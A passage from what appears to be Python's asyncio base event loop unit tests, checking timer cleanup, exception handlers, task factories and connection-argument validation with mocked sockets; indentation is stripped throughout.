self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = self.loop.create_future()
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_run_until_complete_loop_orphan_future_close_loop(self):
class ShowStopper(SystemExit):
pass
async def foo(delay):
await asyncio.sleep(delay)
def throw():
raise ShowStopper
self.loop._process_events = mock.Mock()
self.loop.call_soon(throw)
with self.assertRaises(ShowStopper):
self.loop.run_until_complete(foo(0.1))
# This call fails if run_until_complete does not clean up
# done-callback for the previous future.
self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
async def zero_error_coro():
await asyncio.sleep(0.01)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
async def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
# -X dev
sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
'-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_create_task(self):
class MyTask(asyncio.Task):
pass
async def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_create_named_task_with_default_factory(self):
async def test():
pass
loop = asyncio.new_event_loop()
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_create_named_task_with_custom_factory(self):
def task_factory(loop, coro):
return asyncio.Task(coro, loop=loop)
async def test():
pass
loop = asyncio.new_event_loop()
loop.set_task_factory(task_factory)
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
        # run_forever() consumes the KeyboardInterrupt and therefore does not
        # log a warning
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
        # it's a de facto standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
# Create an async generator, iterate it partially, and leave it
# to be garbage collected.
# Used in async generator finalization tests.
# Depends on implementation details of garbage collector. Changes
# in gc may break this function.
status = {'started': False,
'stopped': False,
'finalized': False}
async def agen():
status['started'] = True
try:
for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
yield item
finally:
status['finalized'] = True
ag = agen()
ai = ag.__aiter__()
async def iter_one():
try:
item = await ai.__anext__()
except StopAsyncIteration:
return
if item == 'THREE':
status['stopped'] = True
return
asyncio.create_task(iter_one())
asyncio.create_task(iter_one())
return status
def test_asyncgen_finalization_by_gc(self):
# Async generators should be finalized when garbage collected.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
support.gc_collect()
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
# Python issue 34769: If garbage collector runs in another
# thread, async generators will not finalize in debug
# mode.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
self.loop.set_debug(True)
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
self.loop.run_until_complete(
self.loop.run_in_executor(None, support.gc_collect))
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
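# Minimal protocols used by the connection tests below; they simply track state transitions.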
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.get_running_loop().create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
m_gai.side_effect = lambda *args: 42
r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = self.loop.create_future()
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_server(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'no IPv6 support')
def test_create_server_ipv6(self):
async def main():
srv = await asyncio.start_server(lambda: None, '::1', 0)
try:
self.assertGreater(len(srv.sockets), 0)
finally:
srv.close()
await srv.wait_closed()
try:
self.loop.run_until_complete(main())
except OSError as ex:
if (hasattr(errno, 'EADDRNOTAVAIL') and
ex.errno == errno.EADDRNOTAVAIL):
self.skipTest('failed to bind to ::1')
else:
raise
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
async def getaddrinfo(*args, **kw):
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
m_socket.socket.return_value.bind = bind
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
if socket_helper.IPV6_ENABLED:
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms
# ('::1', 80) to ('::1', 80, 0, 0). The last 0s are flow info,
# scope id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'no IPv6 support')
@unittest.skipIf(sys.platform.startswith('aix'),
"bpo-25545: IPv6 scope id and getaddrinfo() behave differently on AIX")
@patch_socket
def test_create_connection_ipv6_scope(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
sock.family = socket.AF_INET6
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, 'fe80::1%1', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('fe80::1', 80, 0, 1))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
async def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
# See http://bugs.python.org/issue27136, fallback to getaddrinfo when
# we can't recognize an address is resolved, e.g. a Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = self.loop.create_future()
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = self.loop.create_future()
self.loop.sock_connect.return_value.set_result(None)
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
handshake_timeout = object()
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org',
ssl_handshake_timeout=handshake_timeout)
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
# if host is empty string use None instead
host = object()
async def getaddrinfo(*args, **kw):
nonlocal host
